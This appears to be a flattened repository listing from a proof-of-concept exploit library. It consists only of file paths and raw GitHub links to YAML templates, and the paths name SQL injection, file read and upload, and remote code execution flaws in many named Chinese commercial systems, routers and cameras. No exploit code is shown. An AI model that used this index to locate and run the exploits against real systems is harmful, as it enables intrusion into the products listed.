https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/中移铁通禹路由器信息泄露漏洞/TVE-2024-005151717.yaml -------------------------------------------------------------------------------- /2024-5-17/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞/TVE-2024-105171049.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞/TVE-2024-105171049.yaml -------------------------------------------------------------------------------- /2024-5-17/大华智能物联综合管理平台log4j远程代码执行漏洞/TVE-2024-105161430.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/大华智能物联综合管理平台log4j远程代码执行漏洞/TVE-2024-105161430.yaml -------------------------------------------------------------------------------- /2024-5-17/瑞友天翼应用虚拟化系统小于7.0.5.1远程代码执行漏洞/TVE-2024-105161640.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/瑞友天翼应用虚拟化系统小于7.0.5.1远程代码执行漏洞/TVE-2024-105161640.yaml -------------------------------------------------------------------------------- /2024-5-17/英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传漏洞/TVE-2024-105171524.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传漏洞/TVE-2024-105171524.yaml -------------------------------------------------------------------------------- /2024-5-24/Gradio component_server 任意文件读取漏洞复现(CVE-2024-1561)/CVE-2024-1561.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/Gradio component_server 任意文件读取漏洞复现(CVE-2024-1561)/CVE-2024-1561.yaml -------------------------------------------------------------------------------- /2024-5-24/LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现/TVE-2024-105231115.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现/TVE-2024-105231115.yaml -------------------------------------------------------------------------------- /2024-5-24/LVS精益价值管理系统 LVS.Web.ashx SQL注入漏洞复现/TVE-2024-105222224.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/LVS精益价值管理系统 LVS.Web.ashx SQL注入漏洞复现/TVE-2024-105222224.yaml -------------------------------------------------------------------------------- /2024-5-24/SeaCMS海洋影视管理系统dmku存在SQL注入漏洞/TVE-2024-105221050.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/SeaCMS海洋影视管理系统dmku存在SQL注入漏洞/TVE-2024-105221050.yaml -------------------------------------------------------------------------------- /2024-5-24/WAGO系统 远程代码执行漏洞/rce.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/WAGO系统 远程代码执行漏洞/rce.yaml -------------------------------------------------------------------------------- /2024-5-24/WVP-GB28181摄像头管理平台 user 信息泄露漏洞/TVE-2024-105251100.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/WVP-GB28181摄像头管理平台 user 信息泄露漏洞/TVE-2024-105251100.yaml -------------------------------------------------------------------------------- /2024-5-24/pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx 文件读取漏洞/TVE-2024-105241115.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx 文件读取漏洞/TVE-2024-105241115.yaml -------------------------------------------------------------------------------- /2024-5-24/优卡特脸爱云一脸通智慧平台 UpLoadPic.ashx 文件上传致RCE漏洞/TVE-2024-105241410.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/优卡特脸爱云一脸通智慧平台 UpLoadPic.ashx 文件上传致RCE漏洞/TVE-2024-105241410.yaml -------------------------------------------------------------------------------- /2024-5-24/佳会视频会议attachment任意文件读取漏洞/TVE-2024-105202126.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/佳会视频会议attachment任意文件读取漏洞/TVE-2024-105202126.yaml -------------------------------------------------------------------------------- /2024-5-24/六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982)/CVE-2024-34982.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982)/CVE-2024-34982.yaml -------------------------------------------------------------------------------- /2024-5-24/号卡集团分销管理系统 ue_serve.php 任意文件上传漏洞复现/TVE-2024-105221400.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/号卡集团分销管理系统 ue_serve.php 任意文件上传漏洞复现/TVE-2024-105221400.yaml -------------------------------------------------------------------------------- /2024-5-24/宏景eHR DisplayFiles 任意文件读取漏洞/TVE-2024-105231520.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/宏景eHR DisplayFiles 任意文件读取漏洞/TVE-2024-105231520.yaml -------------------------------------------------------------------------------- /2024-5-24/宏景eHR OutputCode 任意文件读取漏洞复现/TVE-2024-105231344.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/宏景eHR OutputCode 任意文件读取漏洞复现/TVE-2024-105231344.yaml -------------------------------------------------------------------------------- /2024-5-24/方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现/TVE-2024-105211400.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现/TVE-2024-105211400.yaml -------------------------------------------------------------------------------- /2024-5-24/方正畅享全媒体采编系统敏感信息泄露/TVE-2024-105211123.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/方正畅享全媒体采编系统敏感信息泄露/TVE-2024-105211123.yaml -------------------------------------------------------------------------------- /2024-5-24/智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞/TVE-2024-105251150.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞/TVE-2024-105251150.yaml -------------------------------------------------------------------------------- /2024-5-24/泛微E-Mobile client.do 命令执行漏洞复现/TVE-2024-105221746.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/泛微E-Mobile client.do 命令执行漏洞复现/TVE-2024-105221746.yaml -------------------------------------------------------------------------------- /2024-5-24/用友CRM系统uploadfile.php接口存在任意文件上传漏洞/TVE-2024-105201748.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/用友CRM系统uploadfile.php接口存在任意文件上传漏洞/TVE-2024-105201748.yaml -------------------------------------------------------------------------------- /2024-5-24/电信网关配置管理系统 rewrite.php 文件上传致RCE漏洞/TVE-2024-105271649.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/电信网关配置管理系统 rewrite.php 文件上传致RCE漏洞/TVE-2024-105271649.yaml -------------------------------------------------------------------------------- /2024-5-24/短视频矩阵营销系统 poihuoqu 任意文件读取漏洞/TVE-2024-105232028.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/短视频矩阵营销系统 poihuoqu 任意文件读取漏洞/TVE-2024-105232028.yaml -------------------------------------------------------------------------------- /2024-5-24/科拓全智能停车收费系统 DoubtCarNoListFrom.aspx SQL注入漏洞/TVE-2024-105201340.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/科拓全智能停车收费系统 DoubtCarNoListFrom.aspx SQL注入漏洞/TVE-2024-105201340.yaml -------------------------------------------------------------------------------- /2024-5-24/科拓全智能停车收费系统Webservice.asmx存在任意文件上传漏洞/TVE-2024-105201530.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/科拓全智能停车收费系统Webservice.asmx存在任意文件上传漏洞/TVE-2024-105201530.yaml -------------------------------------------------------------------------------- /2024-5-24/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/TVE-2024-105241610.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/TVE-2024-105241610.yaml -------------------------------------------------------------------------------- /2024-5-24/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/UniNXG_enc.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/UniNXG_enc.py -------------------------------------------------------------------------------- /2024-5-24/聚恒中台系统 data.ashx SQL注入致RCE漏洞/TVE-2024-105211431.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/聚恒中台系统 data.ashx SQL注入致RCE漏洞/TVE-2024-105211431.yaml -------------------------------------------------------------------------------- /2024-5-24/蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞/TVE-2024-105271400.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞/TVE-2024-105271400.yaml -------------------------------------------------------------------------------- /2024-5-24/蓝网科技临床浏览系统 deleteStudy SQL注入漏洞/TVE-2024-105232218.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-24/蓝网科技临床浏览系统 deleteStudy SQL注入漏洞/TVE-2024-105232218.yaml -------------------------------------------------------------------------------- /2024-5-30/DT-高清车牌识别摄像机 任意文件读取漏洞/TVE-2024-105301406.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/DT-高清车牌识别摄像机 任意文件读取漏洞/TVE-2024-105301406.yaml -------------------------------------------------------------------------------- /2024-5-30/H3C路由器userLogin.asp信息泄漏漏洞/TVE-2024-105291620.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/H3C路由器userLogin.asp信息泄漏漏洞/TVE-2024-105291620.yaml -------------------------------------------------------------------------------- /2024-5-30/JEPaaS 低代码平台 document-file 文件上传致RCE漏洞/TVE-2024-105291424.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/JEPaaS 低代码平台 document-file 文件上传致RCE漏洞/TVE-2024-105291424.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105251420.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105251420.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105251620.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105251620.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105271135.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105271135.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105271440.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105271440.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272050.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272050.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272055.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272055.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272110.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272110.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272120.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272120.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272125.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272125.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272130.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272130.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272140.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105272140.yaml -------------------------------------------------------------------------------- /2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105281745.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/RuvarOA协同办公平台 多处 SQL注入漏洞/TVE-2024-105281745.yaml -------------------------------------------------------------------------------- /2024-5-30/SpringBlade tenant-list SQL 注入漏洞/TVE-2024-105311630.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/SpringBlade tenant-list SQL 注入漏洞/TVE-2024-105311630.yaml -------------------------------------------------------------------------------- /2024-5-30/万户ezEIP-success.aspx存在反序列化漏洞/TVE-2024-105291951.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/万户ezEIP-success.aspx存在反序列化漏洞/TVE-2024-105291951.yaml -------------------------------------------------------------------------------- /2024-5-30/中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现/TVE-2024-105301530.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现/TVE-2024-105301530.yaml -------------------------------------------------------------------------------- /2024-5-30/智邦国际 ERP downfile.asp 任意文件读取漏洞/TVE-2024-105291421.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/智邦国际 ERP downfile.asp 任意文件读取漏洞/TVE-2024-105291421.yaml -------------------------------------------------------------------------------- /2024-5-30/智邦国际ERP SQL注入漏洞/TVE-2024-105291413.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/智邦国际ERP SQL注入漏洞/TVE-2024-105291413.yaml -------------------------------------------------------------------------------- /2024-5-30/海康威视综合安防管理平台 orgManage-v1-orgs-download 任意文件读取漏洞/TVE-2024-105311401.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/海康威视综合安防管理平台 orgManage-v1-orgs-download 任意文件读取漏洞/TVE-2024-105311401.yaml -------------------------------------------------------------------------------- /2024-5-30/用友NC linkVoucher SQL注入漏洞复现/TVE-2024-105281100.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/用友NC linkVoucher SQL注入漏洞复现/TVE-2024-105281100.yaml -------------------------------------------------------------------------------- /2024-5-30/电信网关配置管理后台rewrite.php接口存在文件上传漏洞/TVE-2024-106021524.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/电信网关配置管理后台rewrite.php接口存在文件上传漏洞/TVE-2024-106021524.yaml -------------------------------------------------------------------------------- /2024-5-30/福建科立讯通信 指挥调度管理平台 ajax_users.php SQL注入漏洞/TVE-2024-105271530.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/福建科立讯通信 指挥调度管理平台 ajax_users.php SQL注入漏洞/TVE-2024-105271530.yaml -------------------------------------------------------------------------------- /2024-5-30/致远M3 log 敏感信息泄露漏洞/TVE-2024-106021804.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/致远M3 log 敏感信息泄露漏洞/TVE-2024-106021804.yaml -------------------------------------------------------------------------------- /2024-5-30/致远OAV52019系统properties信息泄露漏洞/TVE-2024-106021805.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-30/致远OAV52019系统properties信息泄露漏洞/TVE-2024-106021805.yaml -------------------------------------------------------------------------------- /2024-6-07/H3C-CVM-upload接口前台任意文件上传漏洞复现/TVE-2024-106052019.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/H3C-CVM-upload接口前台任意文件上传漏洞复现/TVE-2024-106052019.yaml -------------------------------------------------------------------------------- /2024-6-07/I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞/TVE-2024-106071404.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞/TVE-2024-106071404.yaml -------------------------------------------------------------------------------- /2024-6-07/OrangeHRM-viewProjects接口存在SQL注入漏洞/TVE-2024-106061623.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/OrangeHRM-viewProjects接口存在SQL注入漏洞/TVE-2024-106061623.yaml -------------------------------------------------------------------------------- /2024-6-07/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞/TVE-2024-106051670.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞/TVE-2024-106051670.yaml -------------------------------------------------------------------------------- /2024-6-07/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞/ea7d80f525_202406051410资产数据.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞/ea7d80f525_202406051410资产数据.csv -------------------------------------------------------------------------------- /2024-6-07/宏景eHR openFile.jsp 任意文件读取漏洞复现/TVE-2024-106061131.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/宏景eHR openFile.jsp 任意文件读取漏洞复现/TVE-2024-106061131.yaml -------------------------------------------------------------------------------- /2024-6-07/智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞/TVE-2024-106041611.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞/TVE-2024-106041611.yaml -------------------------------------------------------------------------------- /2024-6-07/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞/TVE-2024-106031830.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞/TVE-2024-106031830.yaml -------------------------------------------------------------------------------- /2024-6-07/泛微OA-E-Cology-ResourceServlet接口任意文件读取漏洞/TVE-2024-106032020.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/泛微OA-E-Cology-ResourceServlet接口任意文件读取漏洞/TVE-2024-106032020.yaml -------------------------------------------------------------------------------- /2024-6-07/泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞/TVE-2024-106031520.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞/TVE-2024-106031520.yaml -------------------------------------------------------------------------------- /2024-6-07/泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞/TVE-2024-106051320.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞/TVE-2024-106051320.yaml -------------------------------------------------------------------------------- /2024-6-07/用友NC pagesServlet SQL注入致RCE漏洞/TVE-2024-106041130.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/用友NC pagesServlet SQL注入致RCE漏洞/TVE-2024-106041130.yaml -------------------------------------------------------------------------------- /2024-6-07/迈普 多业务融合网关 send_order.cgi 前台RCE漏洞/TVE-2024-106041530.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/迈普 多业务融合网关 send_order.cgi 前台RCE漏洞/TVE-2024-106041530.yaml -------------------------------------------------------------------------------- /2024-6-07/金蝶云星空UserService反序列化漏洞/TVE-2024-106031120.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/金蝶云星空UserService反序列化漏洞/TVE-2024-106031120.yaml -------------------------------------------------------------------------------- /2024-6-07/锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞复现(XVE-2024-2116)/XVE-2024-2116.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-6-07/锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞复现(XVE-2024-2116)/XVE-2024-2116.yaml -------------------------------------------------------------------------------- /2024-7-xray/3CX Phone SMC 任意文件读取漏洞/file-read.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/3CX Phone SMC 任意文件读取漏洞/file-read.yml -------------------------------------------------------------------------------- /2024-7-xray/3C环境自动监测监控系统 ReadLog 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/3C环境自动监测监控系统 ReadLog 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/Bazaar v1.4.3 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/Bazaar v1.4.3 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/ClusterControl v2 存在任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/ClusterControl v2 存在任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/Jeecg-Boot loadTableData 远程代码执行漏洞/rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/Jeecg-Boot loadTableData 远程代码执行漏洞/rce.yml -------------------------------------------------------------------------------- /2024-7-xray/LiveBOS UploadFile.do 任意文件上传漏洞/file-upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/LiveBOS UploadFile.do 任意文件上传漏洞/file-upload.yml -------------------------------------------------------------------------------- /2024-7-xray/Netgear WN604无线路由器 siteSurvey.php 存在未授权访问漏洞/unauth.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/Netgear WN604无线路由器 siteSurvey.php 存在未授权访问漏洞/unauth.yml -------------------------------------------------------------------------------- /2024-7-xray/SpringBlade menu-list SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/SpringBlade menu-list SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/企望制造ERP系统 comboxstore 远程命令执行漏洞/rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/企望制造ERP系统 comboxstore 远程命令执行漏洞/rce.yml -------------------------------------------------------------------------------- /2024-7-xray/华天动力OA downloadWpsFile.jsp 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/华天动力OA downloadWpsFile.jsp 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/华磊科技物流 getOrderTrackingNumberSQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/华磊科技物流 getOrderTrackingNumberSQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-7-xray/夏普Sharp 多功能打印机 Cookie泄露致登录绕过漏洞/idor.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/夏普Sharp 多功能打印机 Cookie泄露致登录绕过漏洞/idor.yml -------------------------------------------------------------------------------- /2024-7-xray/夏普Sharp 多功能打印机 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/夏普Sharp 多功能打印机 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/天融信接入网关系统存在弱口令漏洞/weak_paswd.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/天融信接入网关系统存在弱口令漏洞/weak_paswd.yml -------------------------------------------------------------------------------- /2024-7-xray/天问物业ERP系统 OwnerVacantDownLoad 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/天问物业ERP系统 OwnerVacantDownLoad 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/天问物业ERP系统 ParkingFeelFileDownLoad 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/天问物业ERP系统 ParkingFeelFileDownLoad 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/天问物业ERP系统 VacantDiscountDownLoad 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/天问物业ERP系统 VacantDiscountDownLoad 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-7-xray/泛微E-Mobile installOperate.do SSRF漏洞/ssrf.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/泛微E-Mobile installOperate.do SSRF漏洞/ssrf.yml -------------------------------------------------------------------------------- /2024-7-xray/海康威视-综合安防管理平台 keepAlive 存在 FastJson 反序列化/deserialization.yml: -------------------------------------------------------------------------------- 